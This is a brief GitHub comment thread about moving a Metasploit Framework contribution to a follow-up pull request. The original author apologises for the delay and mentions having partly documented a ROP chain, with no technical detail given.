@dmchell @rwhitcroft We created a follow up PR with the latest changes over here (commits are preserverd):
https://github.com/rapid7/metasploit-framework/pull/8355

2017-05-08 20:53 UTC, wchen-r7 commented
Hi @dmchell, we will go ahead and continue this PR with #8355. You are still fully credited. Thanks!

2017-05-08 20:53 UTC, closed without merging

2017-05-09 19:26 UTC, dmchell commented
@wchen-r7 Sorry guys, my wife spawned (twice) a few weeks ago and it nuked all my R&D time then I lost track of all the comments/requests. I got as far as mostly documenting the ROP chain from rsaenh but it sounds like collectively you've far exceeded this, good work!